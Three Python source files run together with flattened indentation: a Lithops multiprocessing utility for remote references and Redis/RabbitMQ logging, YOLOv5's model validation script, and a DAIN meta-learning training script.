def __init__(self, referenced, managed=False, client=None):
if isinstance(referenced, str):
referenced = [referenced]
if not isinstance(referenced, list):
raise TypeError("referenced must be a key (str) or"
"a list of keys")
self._referenced = referenced
# reference counter key
self._rck = '{}-{}'.format('ref', self._referenced[0])
self._referenced.append(self._rck)
self._client = client or get_cache_client()
self._client.set(self._rck, 0)
self._callback = None
self.managed = managed
@property
def managed(self):
return self._callback is None
@managed.setter
def managed(self, value):
managed = value
if self._callback is not None:
self._callback.atexit = False
self._callback.detach()
if managed:
self._callback = None
else:
self._callback = weakref.finalize(self, type(self)._finalize,
self._client, self._rck, self._referenced)
def __getstate__(self):
return (self._rck, self._referenced,
self._client, self.managed)
def __setstate__(self, state):
(self._rck, self._referenced,
self._client) = state[:-1]
self._callback = None
self.managed = state[-1]
self.incref()
def incref(self):
if not self.managed:
return int(self._client.incr(self._rck, 1))
def decref(self):
if not self.managed:
return int(self._client.decr(self._rck, 1))
def refcount(self):
count = self._client.get(self._rck)
return 1 if count is None else int(count) + 1
def collect(self):
if len(self._referenced) > 0:
for ref in self._referenced:
self._client.delete(ref)
self._referenced = []
@staticmethod
def _finalize(client, rck, referenced):
count = int(client.decr(rck, 1))
if count < 0 and len(referenced) > 0:
for ref in referenced:
    client.delete(ref)
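# Illustrative usage sketch (not part of the original module), assuming a reachable cache
# backend configured for Lithops:
# >>> ref = RemoteReference('my-shared-key')  # unmanaged: garbage collected via refcount
# >>> ref.incref()                            # e.g. another pickled copy starts pointing at it
# >>> ref.refcount()
# 2
# >>> ref.collect()                           # explicitly delete the referenced keys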
if 'redis' in mp_config.get_parameter(mp_config.CACHE) and mp_config.get_parameter(mp_config.AMQP) == '':
class RemoteLogIOBuffer:
def __init__(self, stream):
self._feeder_thread = threading
self._buff = io.StringIO()
self._client = get_cache_client()
self._stream = stream
self._offset = 0
def write(self, log):
self._buff.write(log)
# self.flush()
self._old_stdout.write(log)
def flush(self):
self._buff.seek(self._offset)
log = self._buff.read()
self._client.publish(self._stream, log)
self._offset = self._buff.tell()
# self._buff = io.StringIO()
# FIXME flush() does not empty the buffer?
self._buff.flush()
def start(self):
import sys
self._old_stdout = sys.stdout
sys.stdout = self
logger.debug('Starting remote logging feed to stream %s', self._stream)
def stop(self):
import sys
sys.stdout = self._old_stdout
logger.debug('Stopping remote logging feed to stream %s', self._stream)
class RemoteLoggingFeed:
def __init__(self, stream):
self._logger_thread = threading.Thread(target=self._logger_monitor, args=(stream,))
self._stream = stream
self._enabled = False
def _logger_monitor(self, stream):
logger.debug('Starting logger monitor thread for stream {}'.format(stream))
cache_pubsub = get_cache_client().pubsub()
cache_pubsub.subscribe(stream)
while self._enabled:
msg = cache_pubsub.get_message(ignore_subscribe_messages=True, timeout=1)
if msg is None:
continue
if 'data' in msg:
sys.stdout.write(msg['data'].decode('utf-8'))
logger.debug('Logger monitor thread for stream {} finished'.format(stream))
def start(self):
# self._logger_thread.daemon = True
self._enabled = True
self._logger_thread.start()
def stop(self):
self._enabled = False
self._logger_thread.join(5)
elif 'rabbitmq' in mp_config.get_parameter(mp_config.AMQP) :
class RemoteLogIOBuffer:
def __init__(self, stream):
self._feeder_thread = threading
self._buff = io.StringIO()
self._parameters = get_amqp_client()
self._stream = stream
self._connection = pika.BlockingConnection(self._parameters)
self._channel = self._connection.channel()
self._channel.exchange_declare(exchange='exchange-'+self._stream, exchange_type='fanout')
self._channel.queue_declare(queue=self._stream)
self._channel.queue_bind(exchange='exchange-'+self._stream, queue=self._stream)
self._offset = 0
def write(self, log):
self._buff.write(log)
# self.flush()
self._old_stdout.write(log)
def flush(self):
self._buff.seek(self._offset)
log = self._buff.read()
self._channel.basic_publish(exchange='exchange-'+self._stream,routing_key=self._stream,body=log)
self._offset = self._buff.tell()
# self._buff = io.StringIO()
# FIXME flush() does not empty the buffer?
self._buff.flush()
def start(self):
import sys
self._old_stdout = sys.stdout
sys.stdout = self
logger.debug('Starting remote logging feed to stream %s', self._stream)
def stop(self):
import sys
sys.stdout = self._old_stdout
logger.debug('Stopping remote logging feed to stream %s', self._stream)
class RemoteLoggingFeed:
def __init__(self, stream):
self._logger_thread = threading.Thread(target=self._logger_monitor, args=(stream,))
self._parameters = get_amqp_client()
self._stream = stream
self._connection = pika.BlockingConnection(self._parameters)
self._channel = self._connection.channel()
self._channel.exchange_declare(exchange='exchange-'+self._stream, exchange_type='fanout')
self._channel.queue_declare(queue=self._stream)
self._channel.queue_bind(exchange='exchange-'+self._stream, queue=self._stream)
self._enabled = False
def _logger_monitor(self, stream):
while self._enabled:
method, properties, body = self._channel.basic_get(queue=self._stream, auto_ack=False)
msg = body
if msg is None:
continue
else:
sys.stdout.write(msg.decode('utf-8'))
logger.debug('Logger monitor thread for stream {} finished'.format(stream))
def start(self):
# self._logger_thread.daemon = True
self._enabled = True
self._logger_thread.start()
def stop(self):
self._enabled = False
self._logger_thread.join(5)
_afterfork_registry = weakref.WeakValueDictionary()
_afterfork_counter = itertools.count()
def _run_after_forkers():
items = list(_afterfork_registry.items())
items.sort()
for (index, ident, func), obj in items:
try:
func(obj)
except Exception as e:
logger.info('after forker raised exception %s', e)
def register_after_fork(obj, func):
_afterfork_registry[(next(_afterfork_counter), id(obj), func)] = obj
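# Illustrative usage sketch (not part of the original module): register a hook that re-creates
# per-process state after a fork; _run_after_forkers() calls func(obj) for each live obj.
# >>> class Connection:
# ...     def __init__(self):
# ...         register_after_fork(self, Connection._reset)
# ...     def _reset(self):
# ...         pass  # e.g. drop clients/sockets inherited from the parent process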
#
# Finalization using weakrefs
#
_finalizer_registry = {}
_finalizer_counter = itertools.count()
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.common import DetectMultiBackend
from utils.callbacks import Callbacks
from utils.datasets import create_dataloader
from utils.general import (LOGGER, box_iou, check_dataset, check_img_size, check_requirements, check_yaml,
coco80_to_coco91_class, colorstr, increment_path, non_max_suppression, print_args,
scale_coords, xywh2xyxy, xyxy2xywh)
from utils.metrics import ConfusionMatrix, ap_per_class
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])) # IoU above threshold and classes match
if x[0].shape[0]:
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy() # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
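# Illustration of process_batch() semantics (shapes are hypothetical, for clarity only):
#   detections: (N, 6) tensor  [x1, y1, x2, y2, conf, class]
#   labels:     (M, 5) tensor  [class, x1, y1, x2, y2]
#   iouv:       (10,)  IoU thresholds 0.50, 0.55, ..., 0.95 (as built in run() below)
# The returned (N, 10) boolean matrix has correct[i, j] == True when detection i is matched
# to a same-class ground-truth box with IoU >= iouv[j], each label being used at most once.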
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project=ROOT / 'runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device, pt = next(model.parameters()).device, True # get model device, PyTorch model
half &= device.type != 'cpu' # half precision only supported on CUDA
model.half() if half else model.float()
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = DetectMultiBackend(weights, device=device, dnn=dnn)
stride, pt = model.stride, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
half &= pt and device.type != 'cpu' # half precision only supported by PyTorch on CUDA
if pt:
model.model.half() if half else model.model.float()
else:
half = False
batch_size = 1 # export.py models default to batch-size 1
device = torch.device('cpu')
LOGGER.info(f'Forcing --batch-size 1 square inference shape(1,3,{imgsz},{imgsz}) for non-PyTorch backends')
# Data
data = check_dataset(data) # check
# Configure
model.eval()
is_coco = isinstance(data.get('val'), str) and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if pt and device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.model.parameters()))) # warmup
pad = 0.0 if task == 'speed' else 0.5
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, stride, single_cls, pad=pad, rect=pt,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
dt, p, r, f1, mp, mr, map50, map = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (im, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t1 = time_sync()
if pt:
im = im.to(device, non_blocking=True)
targets = targets.to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
nb, _, height, width = im.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Inference
out, train_out = model(im) if training else model(im, augment=augment, val=True) # inference, loss outputs
dt[1] += time_sync() - t2
# Loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t3 = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
dt[2] += time_sync() - t3
# Metrics
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(im[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(im[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
callbacks.run('on_val_image_end', pred, predn, path, names, im[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(im, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(im, output_to_target(out), paths, f, names), daemon=True).start()
# Compute metrics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
LOGGER.info(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
LOGGER.info(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
LOGGER.info(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
LOGGER.info(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default=ROOT / 'runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.data = check_yaml(opt.data) # check YAML
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
print_args(FILE.stem, opt)
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
if opt.conf_thres > 0.001: # https://github.com/ultralytics/yolov5/issues/1466
LOGGER.info(f'WARNING: confidence threshold {opt.conf_thres} >> 0.001 will produce invalid mAP values.')
run(**vars(opt))
elif opt.task == 'speed': # speed benchmarks
# python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
device=opt.device, save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
LOGGER.info(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, device=opt.device, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_val_study(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
train_dain.py
|
import sys
import os
import time
import threading
import torch
from torch.autograd import Variable
import torch.utils.data
from lr_scheduler import *
import cv2
import numpy
from AverageMeter import *
from loss_function import *
import datasets
import balancedsampler
import networks
from my_args import args
import copy
import random
from tqdm import tqdm
import warnings
warnings.filterwarnings("ignore", category=UserWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
META_ALGORITHM = args.meta # [MAML, Reptile]
TRAIN_ITER_CUT = 1e6 if args.train_iter==-1 else args.train_iter
VAL_ITER_CUT = 1e6 if args.val_iter==-1 else args.val_iter
def crop(im, maxH=640, maxW=1280): # crop images if too big (causes out-of-memory error)
# im.size() : NCHW
H, W = im.size(2), im.size(3)
return im[:, :, :min(H, maxH), :min(W, maxW)].clone()
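# Example (hedged): with the defaults, a 1x3x720x1920 tensor is cropped to 1x3x640x1280,
# while an input already within (maxH, maxW) is returned unchanged (as a clone).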
def train():
torch.manual_seed(args.seed)
model = networks.__dict__[args.netName](channel=args.channels,
filter_size = args.filter_size ,
timestep=args.time_step,
training=True)
original_model = networks.__dict__[args.netName](channel=args.channels,
filter_size = args.filter_size ,
timestep=args.time_step,
training=True)
if args.use_cuda:
print("Turn the model into CUDA")
model = model.cuda()
original_model = original_model.cuda()
if not args.SAVED_MODEL==None:
args.SAVED_MODEL ='./model_weights/'+ args.SAVED_MODEL + "/best" + ".pth"
print("Fine tuning on " + args.SAVED_MODEL)
if not args.use_cuda:
pretrained_dict = torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage)
# model.load_state_dict(torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage))
else:
pretrained_dict = torch.load(args.SAVED_MODEL)
# model.load_state_dict(torch.load(args.SAVED_MODEL))
#print([k for k,v in pretrained_dict.items()])
model_dict = model.state_dict()
# 1. filter out unnecessary keys
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
# 2. overwrite entries in the existing state dict
model_dict.update(pretrained_dict)
# 3. load the new state dict
model.load_state_dict(model_dict)
# For comparison in meta training
original_model.load_state_dict(model_dict)
pretrained_dict = None
if type(args.datasetName) == list:
train_sets, test_sets = [],[]
for ii, jj in zip(args.datasetName, args.datasetPath):
tr_s, te_s = datasets.__dict__[ii](jj, split = args.dataset_split,single = args.single_output, task = args.task)
train_sets.append(tr_s)
test_sets.append(te_s)
train_set = torch.utils.data.ConcatDataset(train_sets)
test_set = torch.utils.data.ConcatDataset(test_sets)
else:
train_set, test_set = datasets.__dict__[args.datasetName](args.datasetPath)
train_loader = torch.utils.data.DataLoader(
train_set, batch_size = args.batch_size,
sampler=balancedsampler.RandomBalancedSampler(train_set, int(len(train_set) / args.batch_size )),
num_workers= args.workers, pin_memory=True if args.use_cuda else False)
val_loader = torch.utils.data.DataLoader(test_set, batch_size=args.batch_size,
num_workers=args.workers, pin_memory=True if args.use_cuda else False)
print('{} samples found, {} train samples and {} test samples '.format(len(test_set)+len(train_set),
len(train_set),
len(test_set)))
# if not args.lr == 0:
print("train the interpolation net")
'''optimizer = torch.optim.Adamax([
#{'params': model.initScaleNets_filter.parameters(), 'lr': args.filter_lr_coe * args.lr},
#{'params': model.initScaleNets_filter1.parameters(), 'lr': args.filter_lr_coe * args.lr},
#{'params': model.initScaleNets_filter2.parameters(), 'lr': args.filter_lr_coe * args.lr},
#{'params': model.ctxNet.parameters(), 'lr': args.ctx_lr_coe * args.lr},
#{'params': model.flownets.parameters(), 'lr': args.flow_lr_coe * args.lr},
#{'params': model.depthNet.parameters(), 'lr': args.depth_lr_coe * args.lr},
{'params': model.rectifyNet.parameters(), 'lr': args.rectify_lr}
],
#lr=args.lr, momentum=0, weight_decay=args.weight_decay)
lr=args.lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)'''
optimizer = torch.optim.Adamax(model.rectifyNet.parameters(), lr=args.outer_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
# Fix weights for early layers
for param in model.initScaleNets_filter.parameters():
param.requires_grad = False
for param in model.initScaleNets_filter1.parameters():
param.requires_grad = False
for param in model.initScaleNets_filter2.parameters():
param.requires_grad = False
for param in model.ctxNet.parameters():
param.requires_grad = False
for param in model.flownets.parameters():
param.requires_grad = False
for param in model.depthNet.parameters():
param.requires_grad = False
scheduler = ReduceLROnPlateau(optimizer, 'min',factor=args.factor, patience=args.patience,verbose=True)
print("*********Start Training********")
print("LR is: "+ str(float(optimizer.param_groups[0]['lr'])))
print("EPOCH is: "+ str(int(len(train_set) / args.batch_size )))
print("Num of EPOCH is: "+ str(args.numEpoch))
def count_network_parameters(model):
parameters = filter(lambda p: p.requires_grad, model.parameters())
N = sum([numpy.prod(p.size()) for p in parameters])
return N
print("Num. of model parameters is :" + str(count_network_parameters(model)))
if hasattr(model,'flownets'):
print("Num. of flow model parameters is :" +
str(count_network_parameters(model.flownets)))
if hasattr(model,'initScaleNets_occlusion'):
print("Num. of initScaleNets_occlusion model parameters is :" +
str(count_network_parameters(model.initScaleNets_occlusion) +
count_network_parameters(model.initScaleNets_occlusion1) +
count_network_parameters(model.initScaleNets_occlusion2)))
if hasattr(model,'initScaleNets_filter'):
print("Num. of initScaleNets_filter model parameters is :" +
str(count_network_parameters(model.initScaleNets_filter) +
count_network_parameters(model.initScaleNets_filter1) +
count_network_parameters(model.initScaleNets_filter2)))
if hasattr(model, 'ctxNet'):
print("Num. of ctxNet model parameters is :" +
str(count_network_parameters(model.ctxNet)))
if hasattr(model, 'depthNet'):
print("Num. of depthNet model parameters is :" +
str(count_network_parameters(model.depthNet)))
if hasattr(model,'rectifyNet'):
print("Num. of rectifyNet model parameters is :" +
str(count_network_parameters(model.rectifyNet)))
training_losses = AverageMeter()
#original_training_losses = AverageMeter()
batch_time = AverageMeter()
auxiliary_data = []
saved_total_loss = 10e10
saved_total_PSNR = -1
ikk = 0
for kk in optimizer.param_groups:
if kk['lr'] > 0:
ikk = kk
break
for t in range(args.numEpoch):
print("The id of this in-training network is " + str(args.uid))
print(args)
print("Learning rate for this epoch: %s" % str(round(float(ikk['lr']),7)))
#Turn into training mode
model = model.train()
#for i, (X0_half,X1_half, y_half) in enumerate(train_loader):
_t = time.time()
for i, images in enumerate(train_loader):
if i >= min(TRAIN_ITER_CUT, int(len(train_set) / args.batch_size )):
#(0 if t == 0 else EPOCH):#
break
if args.use_cuda:
images = [im.cuda() for im in images]
images = [Variable(im, requires_grad=False) for im in images]
# For VimeoTriplet
#X0, y, X1 = images[0], images[1], images[2]
# For VimeoSepTuplet
X0, y, X1 = images[2], images[3], images[4]
outerstepsize = args.outer_lr
k = args.num_inner_update # inner loop update iteration
inner_optimizer = torch.optim.Adamax(model.rectifyNet.parameters(),
lr=args.inner_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
if META_ALGORITHM == "Reptile":
# Reptile setting
weights_before = copy.deepcopy(model.state_dict())
for _k in range(k):
indices = [ [0, 2, 4], [2, 4, 6], [2, 3, 4], [0, 1, 2], [4, 5, 6] ]
total_loss = 0
for ind in indices:
meta_X0, meta_y, meta_X1 = images[ind[0]].clone(), images[ind[1]].clone(), images[ind[2]].clone()
diffs, offsets, filters, occlusions = model(torch.stack((meta_X0, meta_y, meta_X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [meta_X0, meta_X1], epsilon=args.epsilon)
_total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
total_loss = total_loss + _total_loss
# total *= 2 / len(indices)
inner_optimizer.zero_grad()
total_loss.backward()
inner_optimizer.step()
# Reptile update
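                # (moves the weights toward the adapted ones:
                #  theta <- theta_before + outerstepsize * (theta_after - theta_before), applied per parameter tensor)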
weights_after = model.state_dict()
model.load_state_dict({name :
weights_before[name] + (weights_after[name] - weights_before[name]) * outerstepsize
for name in weights_before})
with torch.no_grad():
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1], epsilon=args.epsilon)
total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
training_losses.update(total_loss.item(), args.batch_size)
elif META_ALGORITHM == "MAML":
#weights_before = copy.deepcopy(model.state_dict())
base_model = copy.deepcopy(model)
#fast_weights = list(filter(lambda p: p.requires_grad, model.parameters()))
for _k in range(k):
indices = [ [0, 2, 4], [2, 4, 6] ]
support_loss = 0
for ind in indices:
meta_X0, meta_y, meta_X1 = images[ind[0]].clone(), images[ind[1]].clone(), images[ind[2]].clone()
diffs, offsets, filters, occlusions = model(torch.stack((meta_X0, meta_y, meta_X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [meta_X0, meta_X1], epsilon=args.epsilon)
_total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
support_loss = support_loss + _total_loss
#grad = torch.autograd.grad(loss, fast_weights)
#fast_weights = list(map(lambda p: p[1] - args.lr * p[0], zip(grad, fast_weights)))
inner_optimizer.zero_grad()
support_loss.backward() # create_graph=True
inner_optimizer.step()
# Forward on query set
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1], epsilon=args.epsilon)
total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
training_losses.update(total_loss.item(), args.batch_size)
                # copy parameters to connect the computational graph
for param, base_param in zip(model.rectifyNet.parameters(), base_model.rectifyNet.parameters()):
param.data = base_param.data
